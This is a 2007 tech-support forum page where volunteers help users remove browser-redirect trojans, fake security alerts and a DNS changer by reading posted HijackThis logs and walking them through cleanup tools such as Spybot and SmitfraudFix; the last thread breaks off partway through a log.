Explore topic-wise InterviewSolutions in .

This section includes InterviewSolutions, each offering curated multiple-choice questions to sharpen your knowledge and support exam preparation. Choose a topic below to get started.

101.

Solve : Google redirects my webpage?

Answer»

Hi
Just recently my computer is somehow redirecting my webpages I click on when I do a google search. For example, I search for something related to cars in google. When I click that link it takes me to a webpage that has nothing to do with what I searched for. ie spyware or adult stuff. It takes 2 or 3 times of clicking on the original link to get the page I want from google.
I have tried Ad - Ware 2007 and Spybot Search and destroy with no luck.
All help greatly appreciated!!
BTW....this is a fresh install of XP SP2 as I just lost my previous HD last week. (It is getting fixed as we speak...new heads). I havent had luck on my side this past week! Everything WORKED fine for a week until today.Welcome aboard

Download HijackThis: http://majorgeeks.com/Trend_Micro_HijackThis_d5554.html
and post its log back here.Hi
Thanks! 

Here you go...

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 8:58:35 PM, on 11/16/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\wdfmgr.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\System32\alg.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Program Files\Analog Devices\SoundMAX\SMTray.exe
C:\Program Files\Intel\NCS\PROSet\PRONoMgr.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.2\Apps\apdproxy.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\Program Files\HP\Digital Imaging\bin\hpqimzone.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Outlook Express\msimn.exe
C:\Program Files\Messenger\msmsgs.exe
C:\Program Files\Spybot - Search & Destroy\SpybotSD.exe
C:\Program Files\Internet Explorer\IEXPLORE.EXE
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.weatheroffice.gc.ca/city/pages/mb-38_metric_e.html
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [Smapp] C:\Program Files\Analog Devices\SoundMAX\SMTray.exe
O4 - HKLM\..\Run: [PRONoMgr.exe] C:\Program Files\Intel\NCS\PROSet\PRONoMgr.exe
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe"
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.2\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKCU\..\Run: [Orb] "C:\Program Files\Winamp Remote\bin\OrbTray.exe" /background
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Photosmart Premier Fast Start.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqthb08.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{1F268CEC-6ADF-4F70-85A7-BC3096970FFD}: NameServer = 208.67.220.220,208.67.222.222
O17 - HKLM\System\CCS\Services\Tcpip\..\{8CDAF9F3-5059-43CE-A6A6-FABF2F6FE89E}: NameServer = 208.67.220.220,208.67.222.222
O17 - HKLM\System\CS1\Services\Tcpip\Parameters: NameServer = 208.67.220.220,208.67.222.222
O17 - HKLM\System\CS1\Services\Tcpip\..\{1F268CEC-6ADF-4F70-85A7-BC3096970FFD}: NameServer = 208.67.220.220,208.67.222.222
O17 - HKLM\System\CS2\Services\Tcpip\Parameters: NameServer = 85.255.116.158 85.255.112.109
O17 - HKLM\System\CS2\Services\Tcpip\..\{1F268CEC-6ADF-4F70-85A7-BC3096970FFD}: NameServer = 85.255.116.158,85.255.112.109
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 208.67.220.220,208.67.222.222
O23 - Service: Ad-Aware 2007 Service (aawservice) - Lavasoft AB - C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
O23 - Service: Intel NCS NetService (NetSvc) - Intel(R) Corporation - C:\Program Files\Intel\NCS\Sync\NetSvc.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe

--
End of file - 5672 bytes
Let me take a look.1. Print this post out, since you won't have an access to it, at some point.

2. Download, and install Spybot (if you don't have it) from here: http://www.safer-networking.org/en/download/index.html

3. Close all windows, except for HJT.

4.
***** If:
Quote

OrgName:    Freedom Networks LLC
OrgID:      FNL-6
Address:    50 Freemont St.
Address:    16 Floor
City:       San Francisco
StateProv:  CA
PostalCode: 94105
Country:    US
is NOT your ISP,
put a checkmark next to the following HJT entries:
- O17 - HKLM\System\CCS\Services\Tcpip\..\{1F268CEC-6ADF-4F70-85A7-BC3096970FFD}: NameServer = 208.67.220.220,208.67.222.222
- O17 - HKLM\System\CCS\Services\Tcpip\..\{8CDAF9F3-5059-43CE-A6A6-FABF2F6FE89E}: NameServer = 208.67.220.220,208.67.222.222
- O17 - HKLM\System\CS1\Services\Tcpip\Parameters: NameServer = 208.67.220.220,208.67.222.222
- O17 - HKLM\System\CS1\Services\Tcpip\..\{1F268CEC-6ADF-4F70-85A7-BC3096970FFD}: NameServer = 208.67.220.220,208.67.222.222
- O17 - HKLM\System\CCS\Services\Tcpip\Parameters: NameServer = 208.67.220.220,208.67.222.222

***** If:
Quote
OrgName:    RIPE Network Coordination Centre
OrgID:      RIPE
Address:    P.O. Box 10096
City:       Amsterdam
StateProv: 
PostalCode: 1001EB
Country:    NL
is NOT your ISP,
put a checkmark next to the following HJT entries:
- O17 - HKLM\System\CS2\Services\Tcpip\Parameters: NameServer = 85.255.116.158 85.255.112.109
- O17 - HKLM\System\CS2\Services\Tcpip\..\{1F268CEC-6ADF-4F70-85A7-BC3096970FFD}: NameServer = 85.255.116.158,85.255.112.109

5. Click on "Fix It" button.

6. Restart your computer in Safe Mode (keep tapping F8 key, when your computer starts)

7. Run Spybot (check for updates, first), and fix whatever it asks you to fix.

8. Open Windows Explorer. Go Tools>Folder Options, put a checkmark next to "Show hidden files, and folders".

9. Delete following files (if they still exist):

nothing to remove

10. Turn off System Restore:

- Windows XP:
   1. Click Start.
   2. Right-click the My Computer icon, and then click Properties.
   3. Click the System Restore tab.
   4. Check "Turn off System Restore".
   5. Click Apply.   
   6.  When turning off System Restore, the existing restore points will be deleted. Click Yes to do this.
   7. Click OK.
- Windows Vista:
   1. Click Start.
   2. Right-click the Computer icon, and then click Properties.
   3. Click on System Protection under the Tasks column on the left side
   4. Click on Continue on the "User Account Control" window that pops up
   5. Under the System Protection tab, find Available Disks
   6. Uncheck the box for any drive you wish to disable system restore on (in most cases, drive "C:")
   7. When turning off System Restore, the existing restore points will be deleted. Click "Turn System Restore Off" on the popup window to do this.
   8. Click OK

11. Restart in Normal Mode.

12. Turn System Restore on.

13. Run HJT again, and post back its log back here.Neither one should be my ISP (I dont think), especially the AMSTERDAM one.....should I delete them both anyway? Fix them all, then. Post back with new log.Ok.....hows this looking?

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 10:21:29 PM, on 11/16/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\csrss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\igfxtray.exe
C:\WINDOWS\system32\hkcmd.exe
C:\Program Files\Analog Devices\SoundMAX\SMTray.exe
C:\Program Files\Intel\NCS\PROSet\PRONoMgr.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.2\Apps\apdproxy.exe
C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe
C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
C:\WINDOWS\system32\HPZipm12.exe
C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\wdfmgr.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\System32\alg.exe
C:\Program Files\HP\Digital Imaging\bin\hpqimzone.exe
C:\Program Files\HP\Digital Imaging\bin\hpqSTE08.exe
C:\WINDOWS\system32\wbem\wmiprvse.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe
C:\WINDOWS\system32\wuauclt.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.weatheroffice.gc.ca/city/pages/mb-38_metric_e.html
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O4 - HKLM\..\Run: [IgfxTray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [HotKeysCmds] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [Smapp] C:\Program Files\Analog Devices\SoundMAX\SMTray.exe
O4 - HKLM\..\Run: [PRONoMgr.exe] C:\Program Files\Intel\NCS\PROSet\PRONoMgr.exe
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_03\bin\jusched.exe"
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.2\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [HP Software Update] C:\Program Files\HP\HP Software Update\HPWuSchd2.exe
O4 - HKCU\..\Run: [Orb] "C:\Program Files\Winamp Remote\bin\OrbTray.exe" /background
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - Global Startup: HP Digital Imaging Monitor.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqtra08.exe
O4 - Global Startup: HP Photosmart Premier Fast Start.lnk = C:\Program Files\HP\Digital Imaging\bin\hpqthb08.exe
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search & Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O23 - Service: Ad-Aware 2007 Service (aawservice) - Lavasoft AB - C:\Program Files\Lavasoft\Ad-Aware 2007\aawservice.exe
O23 - Service: Intel NCS NetService (NetSvc) - Intel(R) Corporation - C:\Program Files\Intel\NCS\Sync\NetSvc.exe
O23 - Service: Pml Driver HPZ12 - HP - C:\WINDOWS\system32\HPZipm12.exe
O23 - Service: SoundMAX Agent Service (SoundMAX Agent Service (default)) - Analog Devices, Inc. - C:\Program Files\Analog Devices\SoundMAX\SMAgent.exe

--
End of file - 4817 bytes
Did Spybot remove anything?

Are you still having problems?I think it was Zlob DNS changer it removed.
tried it a dozrn or so times....so far so good!We should run another scan to be sure it is gone. Zlob is a trojan and can be well hidden.

Please download Combofix by sUBs from either here or here

Save Combofix.exe to your your Desktop.

1. Double click combofix.exe & follow the prompts. (from the keyboard select 1 and press enter at the prompt)
2. When finished, it will produce a log for you.
3. Attach that log in your next reply.

Note:
Do not mouseclick combofix's window while it's running. That may cause your computer to stall
Your HJT log looks good. No more redirections?I have tried it again today and it still seems to be working good!
Thanks for the help!Cool thing 
Stay safe Crap.....btcar.com and 22traffic.com are coming up again when I try and link to a page from google.
Now what? I have been away for 8 hrs and things were good before I left!!

Thanks
102.

Solve : (help!) you guys ARE my technical support group?

Answer»

*** STOP: 0X0000001E (0XC0000005,0X00000000,0X00000000,0X00000000)
KMODE_EXCEPTION_NOT HANDLED
BEGINNING DUMP OF PHYSICAL MEMORY.
PHYSICAL MEMORY DUMP COMPLETE. CONTACT YOUR SYSTEM ADMINISTRATOR OR TECHNICAL SUPPORT GROUP. May we have a lot more info?Installed any new hardware or updated any DRIVERS recently ? ?

I agree. We need some more info...i DONT know what more info to give, every time i boot my computer up it shows this error message after a minute or so and diesLet's start with what Windows version?
Did it start recently?
Any recent software, hardware changes to your computer?
Windows updates, antivirus, antispyware check up to date?I didnt istall ANYTHING recently. same windows and stuff as always
just with hte blue SCREEN of death"STOP 0x0000001E KMODE_EXCEPTION_NOT_HANDLED"

http://support.microsoft.com/kb/307128lol, I totally get the MEANING!



patio...I have new one for you:

YIKES ! !Now, we need these:

103.

Solve : pc restarts when i connect to the net (dial up)?

Answer»

hey everyone, i hoep someone can help me, i have dial up, and as soon as i connect to the net my pc restarts, i have mcafee and it got rid of all the virus's but it still wont work, i also have that virus or whatever it is that freezes the pc, but its very rare and doesnt happen often, PLEASE help, i need my internet back, my last resort is to formatWelcome aboard

Download HijackThis:
http://www.snapfiles.com/get/hijackthis.html
and post its log back here.ok i did what you said, im not sure how this PROGRAM works but i think i can figure it out. i hope you find the problem for me

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 1:21:05 PM, on 11/21/2007
Platform: Windows 2000 SP4 (WinNT 5.00.2195)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Boot mode: Normal

Running processes:
C:\WINNT\System32\smss.exe
C:\WINNT\system32\winlogon.exe
C:\WINNT\system32\services.exe
C:\WINNT\system32\lsass.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\spoolsv.exe
C:\Program Files\Cosmi\SpyWare Killer 5 in 1\wc\wcservice.exe
C:\WINNT\System32\svchost.exe
C:\WINNT\system32\hidserv.exe
C:\Program Files\Common Files\McAfee\HackerWatch\HWAPI.exe
C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
c:\program files\common files\mcafee\mna\mcnasvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
c:\PROGRA~1\COMMON~1\mcafee\redirsvc\redirsvc.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
C:\Program Files\McAfee\MPF\MPFSrv.exe
C:\PROGRA~1\McAfee\MPS\mps.exe
C:\Program Files\McAfee\MSK\MskSrver.exe
C:\WINNT\system32\regsvc.exe
C:\WINNT\system32\MSTask.exe
C:\WINNT\system32\stisvc.exe
C:\WINNT\System32\WBEM\WinMgmt.exe
C:\WINNT\system32\svchost.exe
C:\WINNT\system32\svchost.exe
C:\Program Files\McAfee\MPS\mpsevh.exe
C:\WINNT\Explorer.EXE
C:\PROGRA~1\McAfee\MSC\mcupdmgr.exe
c:\PROGRA~1\mcafee.com\agent\mcagent.exe
c:\PROGRA~1\mcafee\VIRUSS~1\mcvsshld.exe
C:\Program Files\McAfee\MSK\MskAgent.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.distributel.net/distributel-portail_en.htm
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.distributel.net/distributel-portail_en
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.distributel.net/distributel-portail_en
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://ca.rd.yahoo.com/customize/ie/defaults/su/msgr7/*http://ca.search.yahoo.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page = \blank.htm
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page = c:\secure32.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Distributel
R3 - Default URLSearchHook is missing
O2 - BHO: (no name) - {60D3AAEB-AA39-4AE0-B2F9-E4AF0613A2A3} - C:\PROGRA~1\Cosmi\SPYWAR~1\pop\ABG_PL~1.DLL
O2 - BHO: scriptproxy - {7DB2D5A0-7241-4E79-B68D-6309F01C5231} - c:\program files\mcafee\virusscan\scriptcl.dll
O2 - BHO: ST - {9394EDE7-C8B5-483E-8773-474BF36AF6E4} - C:\Program Files\MSN Apps\ST\01.03.0000.1005\en-xu\stmain.dll
O2 - BHO: (no name) - {9AA2F14F-E956-44B8-8694-A5B615CDF341} - (no file)
O2 - BHO: MSNToolBandBHO - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\01.02.5000.1021\en-ca\msntb.dll
O2 - BHO: McAfee Popup Blocker - {C68AE9C0-0909-4DDC-B661-C1AFB9F5AE53} - c:\program files\mcafee\mps\mcpopup.dll
O3 - Toolbar: msdxmLC.dll,[email protected],&Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINNT\System32\msdxm.ocx
O3 - Toolbar: MSN - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\MSN Apps\MSN Toolbar\01.02.5000.1021\en-ca\msntb.dll
O4 - HKLM\..\Run: [McAfee Privacy Service] C:\Program Files\McAfee\MPS\mps.exe -r
O4 - HKLM\..\Run: [MskAgentexe] C:\Program Files\McAfee\MSK\MskAgent.exe
O4 - HKLM\..\Run: [McENUI] C:\PROGRA~1\McAfee\MHN\McENUI.exe /hide
O4 - HKLM\..\Run: [Synchronization Manager] mobsync.exe /logon
O4 - HKUS\.DEFAULT\..\RunOnce: [^SetupICWDesktop] C:\Program Files\Internet Explorer\Connection Wizard\icwconn1.exe /desktop (User 'Default user')
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0\bin\npjpi150.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0\bin\npjpi150.dll
O23 - Service: Ati HotKey Poller - Unknown owner - C:\WINNT\system32\Ati2evxx.exe (file missing)
O23 - Service: ATI Smart - Unknown owner - C:\WINNT\system32\ati2sgag.exe
O23 - Service: CXPT_Service - Cyberspace Headquarters, LLC - C:\Program Files\Cosmi\SpyWare Killer 5 in 1\wc\wcservice.exe
O23 - Service: Logical Disk Manager ADMINISTRATIVE Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
O23 - Service: McAfee E-mail Proxy (Emproxy) - McAfee, Inc. - C:\PROGRA~1\COMMON~1\McAfee\EmProxy\emproxy.exe
O23 - Service: ZeroSpyware FileDeleter (FileDeleter) - Unknown owner - C:\Program Files\FBM Software\ZeroSpyware Limited Edition\FileDeleter.exe (file missing)
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: McAfee HackerWatch Service - McAfee, Inc. - C:\Program Files\Common Files\McAfee\HackerWatch\HWAPI.exe
O23 - Service: McAfee Update Manager (mcmispupdmgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcupdmgr.exe
O23 - Service: McAfee Services (mcmscsvc) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcmscsvc.exe
O23 - Service: McAfee Network Agent (McNASvc) - McAfee, Inc. - c:\program files\common files\mcafee\mna\mcnasvc.exe
O23 - Service: McAfee Scanner (McODS) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcods.exe
O23 - Service: McAfee Protection Manager (mcpromgr) - McAfee, Inc. - C:\PROGRA~1\McAfee\MSC\mcpromgr.exe
O23 - Service: McAfee Proxy Service (McProxy) - McAfee, Inc. - c:\PROGRA~1\COMMON~1\mcafee\mcproxy\mcproxy.exe
O23 - Service: McAfee Redirector Service (McRedirector) - McAfee, Inc. - c:\PROGRA~1\COMMON~1\mcafee\redirsvc\redirsvc.exe
O23 - Service: McAfee Real-time Scanner (McShield) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcshield.exe
O23 - Service: McAfee SystemGuards (McSysmon) - McAfee, Inc. - C:\PROGRA~1\McAfee\VIRUSS~1\mcsysmon.exe
O23 - Service: McAfee Personal Firewall Service (MpfService) - McAfee, Inc. - C:\Program Files\McAfee\MPF\MPFSrv.exe
O23 - Service: McAfee Privacy Service (MPS9) - McAfee, Inc. - C:\PROGRA~1\McAfee\MPS\mps.exe
O23 - Service: McAfee SpamKiller Service (MSK80Service) - McAfee Inc. - C:\Program Files\McAfee\MSK\MskSrver.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe

--
End of file - 6377 bytes
1. Print out these instructions as we will need to close every window that is open later in the fix.

2. Download SmitfraudFix.exe from here and save it to your desktop:

http://www.bleepingcomputer.com/files/smitfraudfix.php

3. Next, please reboot your computer into Safe Mode by doing the following:

   a. Restart your computer

   b. Start tapping F8 key

   c. A menu will appear

   d. SELECT the first option, to run Windows in Safe Mode.

4. Close all open Windows.

5. Now, double-click on the SmitFraudfix icon.

6. When the tool first starts you will see a credits screen. Simply press any key on your keyboard to get to the next screen.

7. You will now see a menu. Press the number 2 on your keyboard and the press the Enter key to choose the option Clean.

8. The program will start cleaning your computer and go through a series of cleanup processes. When it is done, it will automatically start the Disk Cleanup program.
This program will remove all Temp, Temporary Internet Files, and other files that may be leftover files from this infection. This process can take up a long time depending on your computer, so please be patient. When it is complete, it will close automatically and you should continue with next step.

9. When Disk Cleanup is finished, you will be presented with an option asking Do you want to clean the registry ? (y/n). At this screen you should press the Y button on your keyboard and then press the Enter key.

10. When this last routine is finished, you will be presented with a red screen stating Computer will reboot now. Close all applications. You should now press the spacebar on your computer. A counter will appear stating that the computer will reboot in 15 seconds. Do not cancel this countdown and allow your computer to reboot.

11. Once the computer has rebooted, you will be presented with a Notepad screen containing a log of all the files removed from your computer.
Save that log to your desktop, and attach it to your next reply.

12. Attach new HJT log, as well.

104.

Solve : Highjack this log- Virus?

Answer»

Hello everyone.

Lately I have been having a problem with a Virus I believe.
I ran S&D and it fount registry files and such saying about fake virus protector. So, I fixed the problems and I am still having this annoying thing pop up.

Its down on my icon tray next to my clock. It pops up saying

System Alert!
System has detected blah blah about spyware and such.

Here is my HJT:

---------------------------------------------------------



Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 3:56:08 PM, on 11/20/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
Boot mode: Normal

Running processes:
C:\Windows\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\Windows\system32\services.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Program Files\PC Tools Firewall Plus\FWService.exe
C:\Windows\System32\svchost.exe
C:\Program Files\Ahead\InCD\InCDsrv.exe
C:\Windows\system32\spoolsv.exe
C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
C:\Windows\System32\svchost.exe
C:\WINDOWS\SYSTEM32\USRmlnkA.exe
C:\WINDOWS\SYSTEM32\USRshutA.exe
C:\WINDOWS\SYSTEM32\USRmlnkA.exe
C:\Program Files\Ahead\InCD\InCD.exe
C:\Windows\system32\wscntfy.exe
C:\Windows\explorer.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Administrator\Desktop\HJT\HiJackThis_v2.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://v4.windowsupdate.microsoft.com/
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R3 - URLSearchHook: (no name) - {D73F49B6-B51B-4d32-A3B7-BD04B8342F53} - C:\Program Files\MorpheusBar\SrchAstt\1.bin\MBSRCAS.DLL
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_03\bin\ssv.dll
